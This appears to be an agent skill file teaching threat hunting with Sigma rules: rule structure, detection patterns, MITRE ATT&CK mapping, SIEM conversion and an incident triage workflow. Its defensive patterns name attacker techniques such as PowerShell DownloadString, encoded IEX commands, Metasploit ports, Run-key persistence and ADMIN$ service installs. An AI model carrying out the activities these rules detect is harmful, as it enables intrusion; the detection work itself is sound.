AgentSkillsCN

threat-hunting

运用 Sigma 检测规则与安全分析技术,高效追踪并应对各类威胁。适用于安全事件调查、检测规则制定,或可疑活动分析等场景。

SKILL.md
--- frontmatter
name: threat-hunting
description: Hunt threats using Sigma detection rules and security analysis techniques. Use when investigating security incidents, creating detection rules, or analyzing suspicious activity.

Threat Hunting with Sigma Rules

When to Use This Skill

  • Investigating security incidents
  • Creating detection rules for SIEM
  • Analyzing suspicious activity patterns
  • Building threat detection pipelines
  • Converting detections between platforms

Sigma Rule Basics

Rule Structure

yaml
title: Suspicious PowerShell Download
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
status: experimental
description: Detects PowerShell commands downloading files from the internet
author: Security Team
date: 2024/01/15
modified: 2024/01/20

logsource:
  category: process_creation
  product: windows

detection:
  selection_process:
    Image|endswith: '\powershell.exe'
  selection_commands:
    CommandLine|contains|all:
      - 'Net.WebClient'
      - 'DownloadString'
  condition: selection_process and selection_commands

falsepositives:
  - Legitimate administrative scripts
  - Software installers

level: medium

tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1140

Field Modifiers

ModifierDescriptionExample
containsSubstring matchCommandLine|contains: 'wget'
startswithPrefix matchImage|startswith: 'C:\Temp'
endswithSuffix matchImage|endswith: '.exe'
reRegex matchCommandLine|re: '.*base64.*'
allAll values must match|contains|all:
base64Base64 decode firstCommandLine|base64|contains:
cidrIP range matchDestinationIp|cidr: '10.0.0.0/8'

Common Detection Patterns

Process Creation

yaml
title: Suspicious Process from Temp Directory
logsource:
  category: process_creation
  product: windows

detection:
  selection:
    Image|contains:
      - '\Temp\'
      - '\AppData\Local\Temp\'
    Image|endswith:
      - '.exe'
      - '.com'
      - '.scr'
  filter_known:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
  condition: selection and not filter_known

Network Connections

yaml
title: Outbound Connection to Known Malicious Port
logsource:
  category: network_connection
  product: windows

detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 4444  # Metasploit
      - 5555  # Common RAT
      - 6666  # IRC
      - 8080  # Web proxy
  condition: selection

File Creation

yaml
title: Executable Created in Suspicious Location
logsource:
  category: file_event
  product: windows

detection:
  selection:
    EventType: 'creation'
    TargetFilename|endswith:
      - '.exe'
      - '.dll'
      - '.ps1'
    TargetFilename|contains:
      - '\Windows\Temp\'
      - '\ProgramData\'
      - '\Users\Public\'
  condition: selection

Registry Modifications

yaml
title: Run Key Persistence
logsource:
  category: registry_event
  product: windows

detection:
  selection:
    EventType: SetValue
    TargetObject|contains:
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
      - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
  condition: selection

Hunting Queries

PowerShell Hunting

yaml
# Encoded PowerShell Commands
title: Encoded PowerShell Execution
detection:
  selection:
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - '-e '
    CommandLine|base64offset|contains:
      - 'IEX'
      - 'Invoke-Expression'
  condition: selection

Lateral Movement

yaml
# PsExec-like Activity
title: Remote Service Installation
logsource:
  product: windows
  service: system

detection:
  selection:
    EventID: 7045  # Service installed
    ServiceFileName|contains:
      - '\ADMIN$\'
      - '\C$\'
  condition: selection

Data Exfiltration

yaml
# Large Outbound Transfers
title: Large Data Transfer to External IP
logsource:
  category: proxy

detection:
  selection:
    bytes_out|gt: 10000000  # 10MB
  filter_internal:
    dst_ip|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_internal

MITRE ATT&CK Mapping

yaml
tags:
  # Initial Access
  - attack.initial_access
  - attack.t1566        # Phishing

  # Execution
  - attack.execution
  - attack.t1059.001    # PowerShell
  - attack.t1059.003    # Windows Command Shell

  # Persistence
  - attack.persistence
  - attack.t1547.001    # Registry Run Keys

  # Defense Evasion
  - attack.defense_evasion
  - attack.t1140        # Deobfuscate/Decode

  # Credential Access
  - attack.credential_access
  - attack.t1003        # OS Credential Dumping

  # Lateral Movement
  - attack.lateral_movement
  - attack.t1021.002    # SMB/Windows Admin Shares

Converting Sigma Rules

To Splunk

bash
# Using sigmac (legacy)
sigmac -t splunk -c sysmon rule.yml

# Using sigma-cli
sigma convert -t splunk -p sysmon rule.yml

To Elastic

bash
sigma convert -t elasticsearch -p ecs-windows rule.yml

To Microsoft Sentinel

bash
sigma convert -t microsoft365defender rule.yml

Investigation Workflow

1. Triage Alert

markdown
## Alert Triage Checklist

- [ ] Verify the detection fired correctly
- [ ] Check for false positive indicators
- [ ] Identify affected systems
- [ ] Determine timeline of activity
- [ ] Assess potential impact

2. Gather Context

splunk
# Related process activity
index=windows EventCode=1
| where host="affected_host"
| where _time >= relative_time(now(), "-1h")
| stats count by Image, CommandLine, ParentImage
| sort -count

# Network connections from host
index=network src_ip="10.1.1.50"
| where _time >= relative_time(now(), "-1h")
| stats count by dest_ip, dest_port
| sort -count

3. Timeline Analysis

markdown
| Time | Event | Source | Details |
|------|-------|--------|---------|
| 10:00 | Phishing email | Email logs | malicious.doc attached |
| 10:05 | Document opened | Process logs | WINWORD.EXE spawned |
| 10:06 | PowerShell | Process logs | Encoded command |
| 10:07 | Network conn | Firewall | C2 callback to 1.2.3.4 |
| 10:10 | New service | Event logs | Persistence installed |

4. Containment

bash
# Isolate affected system
# Block IOCs at firewall
# Disable compromised accounts
# Preserve evidence

Rule Testing

python
# Test Sigma rule with pySigma
from sigma.rule import SigmaRule
from sigma.backends.splunk import SplunkBackend

rule = SigmaRule.from_yaml("""
title: Test Rule
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\\cmd.exe'
  condition: selection
""")

backend = SplunkBackend()
print(backend.convert_rule(rule))

Best Practices

  • Test rules against known-good baseline
  • Include false positive documentation
  • Map to MITRE ATT&CK techniques
  • Version control all rules
  • Regular rule review and tuning
  • Document investigation runbooks
  • Share rules with community (when appropriate)